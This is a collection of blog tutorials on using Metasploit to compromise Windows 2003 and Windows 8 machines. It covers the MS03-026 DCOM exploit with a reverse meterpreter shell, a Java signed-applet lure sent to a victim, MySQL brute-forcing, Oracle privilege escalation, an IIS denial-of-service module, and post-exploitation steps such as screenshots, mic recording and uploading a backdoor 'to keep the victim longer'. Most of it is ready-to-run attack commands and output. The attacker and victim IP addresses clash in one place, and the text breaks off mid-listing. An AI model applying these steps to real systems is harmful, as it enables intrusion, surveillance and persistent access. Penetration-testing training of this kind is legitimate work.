Tag Archives: metasploit

HOW TO HACK WINDOWS 2003 SERVER WITH METASPLOIT

How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a a detailed step by step guide on How to pentest Remote PC (Windows 2003 server) with Metasploits. I’ve used BackTrack 5 and Windows 2003 server in a virtual environment. The ease of pentesting is scary and readers, sysadmins are advised to update their Windows 2003 server to the latest patch/service pack and use additional antivirus, firewalls to protect them from similar situation. The author takes no responsibility on how this tutorial is being used by readers and this is for educational purpose only.

Introduction

Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

http://www.backtrack-linux.org/downloads/

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and the most preferred work area is the‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Graphical explanation of their outputs would be given as and when we use them while exploiting some boxes in later part of the article.

  1. search : Typing in the command search along with the keyword lists out the various possible exploits that have that keyword pattern.
  2. show exploits : Typing in the command show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads.
  4. show options : Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘.
  6. use : This command tells Metasploit to use the exploit with the specified name
  7. set RHOST : This command will instruct Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well.
  11. exploit : Actually exploits the service. Another version of exploit,rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console
  12. help : The ‘help’ command will give you basic information of all the commands that are not listed out here.

Now that you are ready with all the basic commands you need to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003
IP: IP: 192.168.42.128

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev
IP: 192.168.42.128

Objective

The only information provided to us about the remote server is that it is a Windows 2003 Server and the Objective is to gain shell access of this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server 192.168.42.129.
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Step 1 – Scan with nmap for open ports - blackMORE Ops

Figure 1

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Step 2 – Open msfconsole - blackMORE Ops

Figure 2

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Step 2 – Open msfconsole-2 - blackMORE Ops

Figure 3

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown below in Figure 4.

Step 3 – Search RPC exploit in Metasploit - blackMORE Ops

Figure 4

As you may have noticed, the default installation of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a specific exploit from this huge list would be a real tedious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/or another alternative would be to use the “search” command in Metasploit to search for related exploits for RPC.
In msfconsole type “search dcerpc” to search all the exploits related todcerpc keyword as that exploit can be used to gain access to the server with a vulnerable port 135. A list of all the related exploits would be presented on the msfconsole window and this is shown below in Figure 5.

Step 3 – Search RPC exploit in Metasploit-2 - blackMORE Ops

Figure 5

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Step 4 – Gather info about target exploit - blackMORE Ops

Figure 6

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Step 5 – Activate exploit - blackMORE Ops

Figure 7

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST 192.168.42.129” and we see that the RHOST is set to 192.168.42.129

Step 6 – Configure exploit - blackMORE Ops

Figure 8

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Step 7 – Set payload for exploit - blackMORE Ops

Figure 9

For our case, we are using the reverse tcp meterpreter which can be set using the command, “set PAYLOAD windows/meterpreter/reverse_tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are properly filled so that the exploit is launched properly

Step 7 – Set payload for exploit-2 - blackMORE Ops

Figure 10

We notice that the LHOST for out payload is not set, so we set it toout local IP ie. 192.168.42.128 using the command “set LHOST 192.168.42.128

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all the exploits but can be a real good support system before you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the Figure below, our selected exploit does not support the check option.

Step 8 – Launch exploit and establish connection - blackMORE Ops

Figure 11

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Step 8 – Launch exploit and establish connection-2 - blackMORE Ops

Figure 12

The above figure shows that the exploit was successfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meterpreter >“.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the below Figure.

Below are the results of some of the meterpreter commands.

Step 9 – Perform an action on pentested server - blackMORE Ops

Figure 13

Step 9 – Perform an action on pentested server-2 - blackMORE Ops

Add new exploits to Metasploit from Exploit-db

All this timeAll this time you were just using mainstream exploits which were famous but old. They worked well, but only with old unpatched operating systems, not the updated ones. Now it’s time to move on to the next step. Our poor experience against Windows 8 and Java 7u60 left us shattered, and we realized that fully patched and updated machines with strong antivirus and firewall can be pretty  hard to break into. Now we will move into the world of real pentesting, and the first step would be introduction to exploit-db.




Exploit-db

As usual, a few official words from the developers before I express my personal views.

The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and proof-of-concepts rather than advisories, making it a valuable resource for those who need actionable data right away. (offensive security)

Some more

The Exploit Database is a CVE-Compatible Database and (where applicable) CVE numbers are assigned to the individual exploit entries in the database. The public database archive does not contain the mapped CVE numbers, but we make them available to our partnering organizations, making links to The Exploit Database entries available within their products.
As many exploit developers lament, it is frequently more difficult to locate a vulnerable application than it is to take a public proof of concept and change it into a working exploit. For this reason, The Exploit Database also hosts the vulnerable application versions whenever possible.
In addition, the team of volunteers that maintain the site also make every effort to verify the submitted exploits and a visual indicator is provided whether or not a successful verification was performed. (Offensive Security)


Now, what exploit db really is, is nothing more than a database where the pentestors who write an exploit for a vulnerability upload the source code of the exploit of other pentestors too see. It is maintained by Offensive Security (the force behind Backtrack, Kali, Metasploit Unleashed). The exploit-db.com site itself is pretty easy to navigate, and you can find all sorts of exploits there. Just finding an exploit, however, is not enough, as you need to add it to Metasploit in order to use it. 

Adobe Flash Player Shader Buffer Overflow

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8. (rapid7)

Now the site suggest that the exploit can be found here.

exploit/windows/browser/adobe_flash_pixel_bender_bof

But using the command

use exploit/windows/browser/adobe_flash_pixel_bender_bof

shows that the exploit is not in Metasploit yet (chances are good it’s there if you update metasploit regularly or if you are reading this tutorial a long time after it was written. Either ways, the method will not differ even if the exploit is already there, so don’t worry. Also you can use a different exploit as per your liking, and just replace the name wherever you see it being used in commands)

Now, there are two alternates. First, update the metasploit framework using 

 

msfupdate

This will update the framework with new modules.

The second alternate the to download the exploit from exploit-db, then put it in the ~/.msf4/modules/exploit/<your_folder> directory. Any exploit put here will be detected my Metasploit when it starts. It will show up when you type use /exploit/your_folder/exploit_name. An important point here is while the <your_folder is arbitrary  and can be set to any value, it is recommended to use a proper directory structure. For example, this exploit should be placed in~/.msf4/modules/exploit/windows/browser/ directory .Also, it is mandatory to place exploits in a subdirectory of ~/.msf4/modules/exploit/ or you won’t be able to use it. For newbies in Linux, here is a detailed step by step guide.

Get the exploit

For examples sake, we’ll use the adobe shader exploit from http://www.exploit-db.com/exploits/33333/ Click on the Save icon to download the exploit. Save it on you Kali Desktop.

.msf4 directory method

Now if you are not well versed with linux, you will need help with creating the directory and placing files there. Although I’m guiding you how to do it, you should be proficient in linux usage and should be able to do the basic stuff like this atleast. So, you can either use the command to line create the directories or do it using the GUI.

Command line method

First, say hi to mkdir

mkdir –help
Usage: mkdir [OPTION]… DIRECTORY…
Create the DIRECTORY(ies), if they do not already exist.

Mandatory arguments to long options are mandatory for short options too.
  -m, –mode=MODE   set file mode (as in chmod), not a=rwx – umask
  -p, –parents     no error if existing, make parent directories as needed
  -v, –verbose     print a message for each created directory
  -Z, –context=CTX  set the SELinux security context of each created
                      directory to CTX
      –help     display this help and exit
      –version  output version information and exit

First we’ll move to the already existent directory using (you need to be in root directory for this to work. Type just cd if unsure, it will automatically take you to root directory)root@kali:~# cd .msf4/modules/    
To see what the directory has, execute ls. It will return nothing as the directory is empty.

root@kali:~/.msf4/modules# ls
Now we’ll use mkdir to create what we need.
root@kali:~/.msf4/modules# mkdir exploits
root@kali:~/.msf4/modules# cd exploits
root@kali:~/.msf4/modules/exploits# mkdir windows        
root@kali:~/.msf4/modules/exploits# cd windows
root@kali:~/.msf4/modules/exploits/windows# mkdir browser
root@kali:~/.msf4/modules/exploits/windows# cp      
If you read the mkdir help thing, you might have noticed the -p option. It makes everything much easier. Everything above can be achieved with something as simple as
root@kali:~# mkdir -p ~/.msf4/modules/exploits/windows/browser
Now meet cp
root@kali:~/.msf4/modules/exploits/windows# cp –help
Usage: cp [OPTION]… [-T] SOURCE DEST
  or:  cp [OPTION]… SOURCE… DIRECTORY
  or:  cp [OPTION]… -t DIRECTORY SOURCE…
Copy SOURCE to DEST, or multiple SOURCE(s) to DIRECTORY.
Assume you have adobe_flash_pixel_bender_bof.rb file on your desktop. Then use the following commands.
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows
root@kali:~# ls 
Desktop  app.apk
root@kali:~# cd Desktop
root@kali:~/Desktop# cp adobe_flash_pixel_bender_bof.rb ~/.msf4/modules/exploits/windows/browser
Now check for yourself
root@kali:~# cd ~/.msf4/modules/exploits/windows/browser
root@kali:~/.msf4/modules/exploits/windows/browser# ls
adobe_flash_pixel_bender_bof.rb

GUI Method

Go to computer -> Filesystem->Home. Now you won’t see .msf4 there, because the . prefix is for hidden files. So go to view and select show hidden items. Now it will be visible.





Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

How To Hack Windows 8 With Metasploit

How To Exploit /  Hack Windows 8 With Metasploit

microsoft-237843_640Allot of you want to Hack Windows 8

In this article we’re going to learn how to exploit (Windows 8 Preview Build 8400) with client-side attack technique, we’ll get meterpreter session on windows 8 machine. For those who don’t know what is metasploit project.

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell-code archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. (Wikipedia)

In this article we’re going to work with Metsaploit the console presented in the first graph.

 win1

Figure 1. Metasploit Console

How to prepare your labs ?

First You need Backtrack 5 with metasploit or you can download metasploit project for your system from link below: http://www.rapid7.com/products/metasploit/download.jsp. Secondly, you need “windows 8 preview Build 8400”

 win2

Figure 2. MSFGUI

Now ready For exploiting ??

1 – first, open the terminal and type “msfconsole“

Note

I typed – sudo su – to take root privilage first because I’m not working on backtrack if you’re on backtack just type msfconsole in terminal as shown in Figure 3

win3

Figure 3. Msf console terminal

Wait for a while and it will be opened, you’ll see a command line starts with MSF> – as shown in the Figure 4.

win4

Figure 4. Msf command line

2 – Secondly, I’ll use an exploit called “Java_signed_applet” which targets JAVA vulnerable versions and can affect a huge amount of computers.

We’ll type in Msf > search java signed, as shown in Figure 5.

win5

Figure 5. Search for java signed applet

We’ll use the first one exploit/multi/browser/java_signed_applet to use any exploit in metasploit project type “use” before exploit name. As shown in Figure 6.

win6

Figure 6. Use exploit

Hint

To get more info about the exploit you can type “info” and you’ll get more information about this exploit – as shown in Figure 7. Here’s the exploit’s description and I think that now we understand how this exploit works (Listing 1). We need to know what’s option for this exploit so we’ll type in “show options” it’s included also in info, as shown in Figure 8.

win7

Figure 7. Exploit information

Listing 1. Exploit Description

Description:

This exploit dynamically creates a .jar file via the

Msf::Exploit::Java mixin,then signs the it. The resulting signed

applet is presented to the victim via a web page with an applet tag.

The victim’s JVM will pop a dialog asking if they trust the signed

applet. On older versions the dialog will display the value of

CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when

the signature is not trusted (i.e., it’s not signed by a trusted

CA). The SigningCert option allows you to provide a trusted code

signing cert, the values in which will override CERTCN. If

SigningCert is not given, a randomly generated selfsigned cert will

be used. Either way, once the user clicks “run”, the applet executes

 

with full user permissions.

win8

Figure 8. Show options

3 – Next, we’ll set the SRVHOST which will be the attacker IP. We’ll type “ifconfig” in terminal to get internal IP address, as shown in Figure 9 – it’s 192.168.1.110.

win9

Figure 9. ifconfig

• We’ll type in “set SRVHOST 192.168.1.110”

• We’ll set the target which is (1 – Windows x86) because we’re going to attack windows machine so type in “set target 1”

• We’ll set the LHOST which is Attacker IP and, because it’s inside an Internal network, we’ll set it with our local IP (192.168.1.110).

win10

Figure 10. set SRVHOST

win11

Figure 11. Set target

win12

Figure 12. Set LHOST

Note

If you’d like to attack outside your local network, you need to set your public IP address in LHOST, and enable DMZ on attacker machine or enable port forwarding.

• Now you need to know which payload you’ll use after attacking machine and the most familiar one is meterpreter, so we’ll set the payload (windows/meterpreter/reverse_tcp), as shown in Figure 13.

win13

Figure 13. Set Payload

Note

If you’d like to use another payload you can type in “show payloads” and choose your preferred payload.

• We’ll specify the URI which will be sent to victim machine. I want to make it on the main directory so I’ll type in “set URIPATH /“ as shown in Figure 14.

win14

Figure 14. Set URIPATH

Note

If you need to specify another URI name you can do it easily by typing in “set URIPATH name” and you can change “name” to your preferred word.

• We’ll type in “exploit” to run it, and it will give us the URI which is our IP address with your preferred URIPATH – Figure 15.

win15

Figure 15. Exploit

Now, We need to send the URL to a victim machine so we’ll open it with our windows8 machine.

• Finally, a message will appear on victim machine after opening URL. If he/she clicked on Run, a meterpreter sessions will be opened in attacker PC, as shown in Figure 16.

win16

Figure 16. Meterpreter

We Can do some commands with victim PC such as capturing screen or recording mic.

First, here’s the first command “sysinfo” – which tell you some information about the system (Figure 17).

win17

Figure 17. System information

We can also see what the processes run at the time in victim machine with “ps” command (Figure 18).

win18

Figure 18. Processes19).

win19

Figure 19. Mic record

And, if you need to take a screen-shot of victim’s screen you can do it easily by “screenshot” command (Figure 20).

win20

Figure 20. Screen-shot

Finally, I tried to upload payload and execute it in victim machine, so, if you want to keep the victim longer with you then you should upload another backdoor to keep in touch with them (Figure 21).

win21

Figure 21. Upload executable file

If you need any help with meterpreter just type “help” and all commands will come up and show in your screen (Figure 22).

win22

Figure 22. Help

References

• http://en.wikipedia.org/wiki/Metasploit_project

• http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

• http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf

How to Work with Metasploit Auxiliary Modules

globe-205190_1280

The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc. are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirement.

Any programmer can develop his own module and port it easily into the framework. Even though modules are not very much talked about while working with metasploit, but they form the crux of the framework so it is essential to have a deep understanding of it.

In this tutorial we will particularly focus on /framework3/modules directory which contains a complete list of useful modules which can ease up our task of penetration testing. Later in the chapter we will also analyse some of the existing modules and finally conclude the discussion by learning how to develop our own modules for metasploit. So let us start our experiments with modules.

Working with Scanner Modules

Let us begin our experimentation with scanner modules. We will start with scanning modules which ships with the framework. Even though nmap is a powerful scanning tool but still there can be situations where we have to perform a specific type of scan like scanning for presence of mysql database etc.

Metasploit provides us a complete list of such useful scanners. Let us move ahead and practically implement some of them. To find the list of available scanners we can browse to /framework3/modules/auxiliary/scanner.

You can find a collection of more than 35 useful scan modules which can be used under various penetration testing scenarios. Let us start with a basic HTTP scanner. You will see that there are lots of different HTTP scan options available. We will discuss few of them here.

Consider the dir_scanner script. This will scan a single host or a complete range of network to look for interesting directory listings that can be further explored to gather information.

To start using an auxiliary module, we will have to perform following steps in our msfconsole:

msf > use auxiliary/scanner/http/dir_scanner

msf auxiliary(dir_scanner) > show options

Module options:

The show options command will list all the available optional parameters that you can pass along with the scanner module. The most important one is the RHOSTS parameter which will help us in targeting either a single user or a range of hosts.

Let us discuss a specific scanner module involving some extra inputs. The mysql_login scanner module is a brute force module which scans for the availability of Mysql server on the target and tries to login to the database by brute force attacking it.

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login): Listing 1.

Listing 1. Module options

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true yes Try blank pas..

BRUTEFORCE_SPEED 5 yes How fast to..

PASSWORD no A specific password

PASS_FILE no File containing..

RHOSTS yes The target address.

RPORT 3306 yes The target port..

STOP_ON_SUCCESS false yes Stop guessing

THREADS 1 yes The number of..

USERNAME no A specific user..

USERPASS_FILE no File containing..

USER_FILE no File containing..

VERBOSE true yes Whether to print..

AS you can see there are lots of different parameters that we can pass to this module. The better we leverage the powers of a module, the greater are our chances of successful penetration testing. We can provide a complete list of username and password which the module can use and try on the target machine. Let us provide this information to the module.

msf auxiliary(mysql_login) > set USER_FILE /users.txt

USER_FILE => /users.txt

msf auxiliary(mysql_login) > set PASS_FILE /pass.txt

PASS_FILE => /pass.txt

Now we are ready to brute force. The last step will be selecting the target and provide the run command to execute the module (Listing 2).

Listing 2. Running a command to execute the module

msf auxiliary(mysql_login) > set RHOSTS 192.168.56.101

RHOSTS => 192.168.56.101

msf auxiliary(mysql_login) > run

[*] 192.168.56.101:3306Found remote MySQL version 5.0.51a

[*] 192.168.56.101:3306 Trying username:’administrator’ with password:’’

The output shows that the module starts the process by first looking for the presence of mysql server on the target. Once it has figured out, it starts trying for the combinations of usernames and password provided to it through external text file. This is also one of the most widely used modular operations of metasploit in current scenario. A lot of automated brute force modules have been developed to break weak passwords.

Working With Admin Auxiliary modules

Moving ahead with our module experiment, we will learn about some admin modules which can be really handy during penetration testing. The admin modules can serve different purposes like it can look for an admin panel, or it can try for admin login etc. It depends upon the functionality of the module. Here we will look at a simple admin auxiliary module called mysql_enum module.

The mysql_enum module is a special utility module for mysql database servers. This module provides simple enumeration of mysql databse server provided proper credentials are provided to connect remotely. Let us understand it in detail by using the module. We will start with launching the msfconsole and providing the path for auxiliary module.

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

Name Current Setting Required Description

—- ————– ——- ———–

PASSWORD no The password for the..

RHOST yes The target address

RPORT 3306 yes The target port

USERNAME no The username to..

As you can see that the modules accepts password, username and RHOST as parameters. This can help the module in first searching for the existence of a mysql database and then apply the credentials to try for remote login. There are several similar modules available for other services like MSSQL, Apache etc. The working process is similar for most of the modules. Remember to use the show options command in order to make sure that you are passing the required parameters to the module.

SQL Injection and DOS attack modules

Metasploit is friendly for both penetration testers as well as hackers. The reason for this is that a penetration tester has to think from hacker’s perspective in order to secure the network. The SQL injection and DOS modules help penetration testers in attacking their own services in order to figure out if they are susceptible to such attacks. So let’s discuss some of these modules in detail. The SQL injection modules use a known vulnerability in the database type to exploit it and provide unauthorized access. The modules can be found in modules/auxiliary/sqli/oracle.

Let us analyse an oracle vulnerability called Oracle DBMS_METADATA XML vulnerability. This vulnerability will escalate the privilege from DB_USER to DBA (Database Administrator). We will be using the dbms_metadata_get_xml module.

msf auxiliary(dbms_metadata_get_xml) > show options

Module options (auxiliary/sqli/oracle/dbms_metadata_get_xml):

Name Current Setting Required Description

—- ———— ——– ———–

DBPASS TIGER yes The password to..

DBUSER SCOTT yes The username to..

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID ORCL yes The sid to authenticate.

SQL GRANT DBA to SCOTT no SQL to execute.

The module requests for similar parameters which we have seen so far. The database first checks to login by using the default login credentials ie, “SCOTT” and “TIGER” as the default username and password respectively. This enables a DB_User level login. Once the modules gains login as a database user, it then executes the exploit to escalate the privilege to the database administrator. Let us execute the module as a test run on our target.

msf auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1

msf auxiliary(dbms_metadata_get_xml) > set SQL YES

msf auxiliary(dbms_metadata_get_xml) > run

On successful execution of module, the user privilege will be escalated from DB_USER to DB_ADMINISTRATOR.

The next module we will cover is related to Denial Of Service (DOS) attack. We will analyze a simple IIS 6.0 vulnerability which allows the attacker to crash the server by sending a POST request containing more than 40000 request parameters. We will analyze the vulnerability shortly. This module has been tested on an un-patched Windows 2003 server running IIS 6.0. The module we will be using is ms10_065_ii6_asp_dos.

msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos

msf auxiliary(ms10_065_ii6_asp_dos) > show options

Module options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos): Listing 3.

Listing 3. Module options

Name Current Setting Required Description

—- ————— ——– ———–

RHOST yes The target address

RPORT 80 yes The target port

URI /page.asp yes URI to request

VHOST no The virtual host name to..

msf auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1

RHOST => 192.168.56.1

msf auxiliary(ms10_065_ii6_asp_dos) > run

[*] Attacking http://192.168.56.1:80/page.asp

Once the module is executed using the run command, it will start attacking the target IIS server by sending HTTP request on port 80 with URI as page.asp. Successful execution of the module will lead to complete denial of service of the IIS server.

Post Exploitation Modules

We also have a separate dedicated list of modules that can enhance our post-exploitation penetration testing experience. Since they are post exploitation modules so we will need an active session with our target. Here we are using an unpatched Windows 7 machine as our target with an active meterpreter session.

[raw] [/raw]

You can locate the post modules in modules/post/windows/gather. Let us start with a simple enum_logged_on_users module. This post module will list the current logged in users in the windows machine.

We will execute the module through our active meterpreter session. Also keep in mind to escalate the privilege using getsystem command in order to avoid any errors during the execution of module (Listing 4).

Listing 4. The Osage of getsystem command

meterpreter > getsystem

got system (via technique 4).

meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users

====================

SID User

— —-

S15212350281388457184790407941598 DARKLORDPCDARKLORD

Recently Logged Users

=====================

SID Profile Path

— ————

S1518 %systemroot%system32configsystemprofile

S1519 C:WindowsServiceProfilesLocalService

S1520 C:WindowsServiceProfilesNetworkService

S152123502 C:UsersDARKLORD

S1521235 C:UsersWinuser

Successful execution of module shows us two tables. The first table reflects the currently logged on user and the second table reflects the recently logged on user. Follow the correct path while executing the modules. We have used the run command to execute the modules as they are all in form of ruby script so meterpreter can easily identify it.

Let us take one more example. There is an interesting post module that captures a screenshot of the target desktop. This module can be useful when we have to know whether there is any active user or not. The module we will use is screen_spy.rb.

meterpreter > run post/windows/gather/screen_spy

[*] Migrating to explorer.exe pid: 1104

[*] Migration successful

[*] Capturing 60 screenshots with a delay of 5 seconds

You might have noticed how easy and useful post modules can be. In the coming future, the developers of metasploit will be focusing more on post modules rather than meterpreter as it greatly enhances the functionality of penetration testing. So if you are looking to contribute to the metasploit community then you can work on post modules.

Basics of Module Building

So far we have seen the utility of modules and the power that they can add to the framework. In order to master the framework it is very essential to understand the working and building of modules. This will help us in quickly extending the framework according to our needs. In the next few recipes we will see how we can use ruby scripting to build our own modules and import them into the framework. To start building our own module we will need basic knowledge of ruby scripting. In this discussion we will see how we can use ruby to start building modules for the framework. The process is very much similar to meterpreter scripting. The difference lies in using a set of pre-defined scripting lines that will be required in order to make the framework understand the requirements and nature of module. Let us start with some of the basics of module building. In order to make our module readable for the framework we will have to import msf libraries.

require ‘msf/core’

This is the first and foremost line of every script. This line tells that the module will include all the dependencies and functionalities of the metasploit framework.

class Metasploit3 < Msf::Auxiliary

This line defines the class which inherits the properties of the Auxiliary family. The Auxiliary module can import several functionalities like scanning, opening connections, using databse etc.

include Msf::

The include statement can be used to include a particular functionality of the framework into our own module. For example, if we are building a scanner module then we can include as:

Include Msf::Exploit::Remote::TCP

This line will include the functionality of a remote TCP scan in the module. This line will pull out the main scan module libraries from the metasploit library (Listing 5).

Listing 5. Pulling out the main scan module from the metasploit library

def initialize

super(

Name’ => ‘TCP Port Scanner’,

Version’ => ‘$Revision$’,

Description’ => ‘Enumerate open TCP services’,

Author’ => [ darklord ],

License’ => MSF_LICENSE

)

The next few lines of script give us an introduction about the module like its name, version, author, description etc (Listing 6). The next few lines of the script are used to initialize values for the script. The options which are marked as ‘true’ are those which are essentially required for the modules whereas the options marked as false are optional. These values can be passed/changed during the execution of a module.

Listing 6. Module’s details

register_options(

[

OptString.new(‘PORTS’, [true, “Ports to scan (e.g. 25,80,110-900)”, “1-10000”]),

OptInt.new(‘TIMEOUT’, [true, “The socket connect timeout in milliseconds”, 1000]),

OptInt.new(‘CONCURRENCY’, [true, “The number of concurrent ports to check per host”, 10]), self.class)

deregister_options(‘RPORT’)

The best way to learn about modules is by mastering ruby scripting and by analyzing existing modules. Let us analyse a simple module here in order to dive deeper into module building. We will be analyzing ftp anonymous access module. You can find the main script at the following location: pentest/exploits/framework3/modules/auxiliary/scanner/ftp/anonymous.rb.

Let us start with the analysis of the main script body to understand how it works.

def run_host(target_host)

begin

res = connect_login(true, false)

banner.strip! if banner

dir = Rex::Text.rand_text_alpha(8)

This function is used to begin the connection. The res variable holds the Boolean value true or false. The connect_login function is a specific function used by the module to establish a connection with the remote host. Depending upon the success or failure of connection, the boolean value is stored in res (Listing 7).

Listing 7. Storing of the boolean value in res

if res

write_check = send_cmd( [‘MKD’, dir] , true)

if (write_check and write_check =~ /^2/)

send_cmd( [‘RMD’, dir] , true)

print_status(“#{target_host}:#{rport} Anonymous

access_type = “rw”

else

print_status(“#{target_host}:#{rport} Anonymous

access_type=”ro”

Once the connection has been setup, the module tries to check if the anonymous user has read/write privilege or not. The write_check variable checks if a write operation is possible or not. Then it is checked weather the operation succeeded or not. Depending upon the status the privilege message is printed on the screen. If the write operation fails then the status is printed as ‘ro’ or read-only (Listing 8).

Listing 8. The result of the operation’s failure

report_auth_info(

:host => target_host,

:port => rport,

:sname => ‘ftp’,

:user => datastore[‘FTPUSER’],

:pass => datastore[‘FTPPASS’],

:type => “password_#{access_type}”,

:active => true

)

end

The next function is used to report authorization info. It reflects important parameters like host, port, user, pass etc. These are the values that appear to us when we use the show options command so these values are user dependent.

This was a quick demonstration of how a simple module functions within the framework. You can change the existing scripts accordingly to meet your needs. This makes the platform extremely portable to development. As I have said it, the best way to learn more about module building is by analyzing the existing scripts.

Building your own Post Exploitation module

Now we have covered up enough background about building modules. Here we will see an example of how we can build our own module and add it into the framework. Building modules can be very handy as it will give us the power of extending the framework depending on our need.

Let us build a small post exploitation module that will enumerate all the installed applications on the target machine. Since it is a post exploitation module, we will require a compromised target in order to execute the module. To start with building the module we will first import the framework libraries and include required dependencies (Listing 9).

Listing 9. Importing the Framework libraries

require ‘msf/core’

require ‘rex’

require ‘msf/core/post/windows/registry’

class Metasploit3 < Msf::Post

include Msf::Post::Windows::Registry

def initialize(info={})

super( update_info( info,

Name’ => ‘Windows Gather Installed Application Enumeration’,

